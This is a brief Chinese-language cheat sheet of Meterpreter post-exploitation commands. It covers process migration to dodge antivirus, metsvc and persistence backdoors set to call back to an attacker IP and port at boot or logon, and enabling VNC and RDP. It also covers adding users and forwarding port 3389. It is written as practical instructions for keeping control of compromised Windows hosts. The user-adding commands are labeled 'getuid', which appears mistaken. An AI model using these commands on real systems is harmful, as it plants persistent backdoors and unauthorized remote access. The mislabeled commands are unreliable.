1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
| 1.migrate migrate pid 可以将meterpreter的当前进程迁移到其他指定进程中,这样做的好处是给后门一个相对稳定的环境,同时可以防止杀软
2.metsvc run metsvc -A meterpreter提供两种方式的后门,一种是通过服务启动(metsvc),一种是通过启动项启动(persistence). 通过服务(metsvc)启动方式,优点是命令简单方便,不需要设置太多参数.缺点是只要发现了这个后门,所有人都可以连接
3.persistence run persistence -S -U -X -i 5 -p 端口 -r ip 通过开机启动项启动的方式,缺点是命令参数多比较复杂,可能因为启动项权限原因,导致失败,且并无回显.优点是,因为载入启动项中,所以一般的杀软都会放行,如果在用shellcode做下免杀会更好,当然这是后话 -A 自动启动一个匹配的exploit / multi / handler来连接到代理 -L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。 -P 有效负载使用,默认为windows / meterpreter / reverse_tcp。 -S 作为服务自动启动代理程序(具有SYSTEM权限) -T 要使用的备用可执行模板 -U 用户登录时自动启动代理 -X 系统引导时自动启动代理程序 -h 这个帮助菜单 -i 每次连接尝试之间的时间间隔(秒) -p 运行Metasploit的系统正在侦听的端口 -r 运行Metasploit监听连接的系统的IP
4.run vnc(远程控制,类似3389远程桌面) run vnc run post/windows/manager/enable_rdp 开启远程桌面
5.getuid(创建一个用户,客户端化) 常用命令 run getuid -e 开启远程桌面 run getuid -u name -p password 添加用户 run getuid -f 4446 -e 将3389端口转发到4446
|